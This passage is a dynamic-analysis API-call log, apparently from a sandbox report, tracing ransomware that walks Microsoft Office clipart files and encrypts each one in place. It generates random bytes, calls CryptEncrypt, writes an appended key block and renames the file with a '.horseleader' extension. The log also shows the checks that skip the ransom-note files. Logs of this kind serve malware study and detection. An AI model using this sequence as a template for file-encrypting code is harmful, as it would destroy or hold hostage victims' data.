lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x25ee, lpOverlapped=0x0) returned 1 [0253.333] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.333] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.333] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.333] CloseHandle (hObject=0x158) returned 1 [0253.333] GetProcessHeap () returned 0x780000 [0253.333] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.333] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.horseleader") returned 79 [0253.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.horseleader")) returned 1 [0253.334] GetProcessHeap () returned 0x780000 [0253.334] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.334] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed01fb00, ftCreationTime.dwHighDateTime=0x1bd4d59, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xed01fb00, ftLastWriteTime.dwHighDateTime=0x1bd4d59, nFileSizeHigh=0x0, nFileSizeLow=0x2244, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19828_.WMF", cAlternateFileName="")) returned 1 [0253.334] lstrcmpiW (lpString1="BD19828_.WMF", lpString2="Windows") returned -1 [0253.335] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 67 [0253.335] StrStrIW (lpFirst="BD19828_.WMF", lpSrch=".horseleader") returned 0x0 [0253.335] lstrcmpW (lpString1="BD19828_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.335] lstrcmpW (lpString1="BD19828_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.335] lstrlenW (lpString=".testttjffg") returned 11 [0253.335] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.335] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.335] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.336] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 67 [0253.336] StrStrW (lpFirst="BD19828_.WMF", lpSrch=".txt") returned 0x0 [0253.336] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8772) returned 1 [0253.336] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2244, lpOverlapped=0x0) returned 1 [0253.339] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffddbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.339] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2244, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2244, lpOverlapped=0x0) returned 1 [0253.339] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.339] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.340] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.340] CloseHandle (hObject=0x158) returned 1 [0253.340] GetProcessHeap () returned 0x780000 [0253.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.340] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.horseleader") returned 79 [0253.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19828_.wmf.horseleader")) returned 1 [0253.341] GetProcessHeap () returned 0x780000 [0253.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.341] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58e2200, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe58e2200, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x3896, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19986_.WMF", cAlternateFileName="")) returned 1 [0253.341] lstrcmpiW (lpString1="BD19986_.WMF", lpString2="Windows") returned -1 [0253.341] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 67 [0253.341] StrStrIW (lpFirst="BD19986_.WMF", lpSrch=".horseleader") returned 0x0 [0253.341] lstrcmpW (lpString1="BD19986_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.341] lstrcmpW (lpString1="BD19986_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.341] lstrlenW (lpString=".testttjffg") returned 11 [0253.342] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.342] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.342] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 67 [0253.343] StrStrW (lpFirst="BD19986_.WMF", lpSrch=".txt") returned 0x0 [0253.343] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14486) returned 1 [0253.343] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3896, lpOverlapped=0x0) returned 1 [0253.356] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc76a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.356] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3896, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3896, lpOverlapped=0x0) returned 1 [0253.356] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.356] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.356] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.356] CloseHandle (hObject=0x158) returned 1 [0253.356] GetProcessHeap () returned 0x780000 [0253.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.356] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.horseleader") returned 79 [0253.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf.horseleader")) returned 1 [0253.358] GetProcessHeap () returned 0x780000 [0253.358] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.358] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1fa9b00, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1fa9b00, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x4780, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19988_.WMF", cAlternateFileName="")) returned 1 [0253.358] lstrcmpiW (lpString1="BD19988_.WMF", lpString2="Windows") returned -1 [0253.358] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 67 [0253.358] StrStrIW (lpFirst="BD19988_.WMF", lpSrch=".horseleader") returned 0x0 [0253.358] lstrcmpW (lpString1="BD19988_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.358] lstrcmpW (lpString1="BD19988_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.358] lstrlenW (lpString=".testttjffg") returned 11 [0253.358] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.358] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.358] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 67 [0253.359] StrStrW (lpFirst="BD19988_.WMF", lpSrch=".txt") returned 0x0 [0253.359] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=18304) returned 1 [0253.359] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4780, lpOverlapped=0x0) returned 1 [0253.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.362] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4780, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4780, lpOverlapped=0x0) returned 1 [0253.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.362] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.363] CloseHandle (hObject=0x158) returned 1 [0253.363] GetProcessHeap () returned 0x780000 [0253.363] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.363] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.horseleader") returned 79 [0253.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.horseleader")) returned 1 [0253.364] GetProcessHeap () returned 0x780000 [0253.364] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.364] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf688200, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbf688200, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x2b32, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD20013_.WMF", cAlternateFileName="")) returned 1 [0253.364] lstrcmpiW (lpString1="BD20013_.WMF", lpString2="Windows") returned -1 [0253.364] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 67 [0253.364] StrStrIW (lpFirst="BD20013_.WMF", lpSrch=".horseleader") returned 0x0 [0253.364] lstrcmpW (lpString1="BD20013_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.364] lstrcmpW (lpString1="BD20013_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.364] lstrlenW (lpString=".testttjffg") returned 11 [0253.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.365] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 67 [0253.366] StrStrW (lpFirst="BD20013_.WMF", lpSrch=".txt") returned 0x0 [0253.366] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11058) returned 1 [0253.366] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2b32, lpOverlapped=0x0) returned 1 [0253.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd4ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.368] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2b32, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2b32, lpOverlapped=0x0) returned 1 [0253.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.369] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.369] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.369] CloseHandle (hObject=0x158) returned 1 [0253.369] GetProcessHeap () returned 0x780000 [0253.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.369] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.horseleader") returned 79 [0253.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.horseleader")) returned 1 [0253.370] GetProcessHeap () returned 0x780000 [0253.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.370] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b147c00, ftCreationTime.dwHighDateTime=0x1bd4b34, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b147c00, ftLastWriteTime.dwHighDateTime=0x1bd4b34, nFileSizeHigh=0x0, nFileSizeLow=0x30e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00008_.WMF", cAlternateFileName="")) returned 1 [0253.370] lstrcmpiW (lpString1="BL00008_.WMF", lpString2="Windows") returned -1 [0253.370] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 67 [0253.370] StrStrIW (lpFirst="BL00008_.WMF", lpSrch=".horseleader") returned 0x0 [0253.370] lstrcmpW (lpString1="BL00008_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.370] lstrcmpW (lpString1="BL00008_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.370] lstrlenW (lpString=".testttjffg") returned 11 [0253.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 67 [0253.372] StrStrW (lpFirst="BL00008_.WMF", lpSrch=".txt") returned 0x0 [0253.372] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12520) returned 1 [0253.372] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x30e8, lpOverlapped=0x0) returned 1 [0253.374] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcf18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.375] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x30e8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x30e8, lpOverlapped=0x0) returned 1 [0253.375] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.375] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.375] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.375] CloseHandle (hObject=0x158) returned 1 [0253.375] GetProcessHeap () returned 0x780000 [0253.375] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.375] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.horseleader") returned 79 [0253.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.horseleader")) returned 1 [0253.376] GetProcessHeap () returned 0x780000 [0253.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.377] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x851e9b00, ftCreationTime.dwHighDateTime=0x1bd4b34, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x851e9b00, ftLastWriteTime.dwHighDateTime=0x1bd4b34, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00012_.WMF", cAlternateFileName="")) returned 1 [0253.377] lstrcmpiW (lpString1="BL00012_.WMF", lpString2="Windows") returned -1 [0253.377] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 67 [0253.377] StrStrIW (lpFirst="BL00012_.WMF", lpSrch=".horseleader") returned 0x0 [0253.377] lstrcmpW 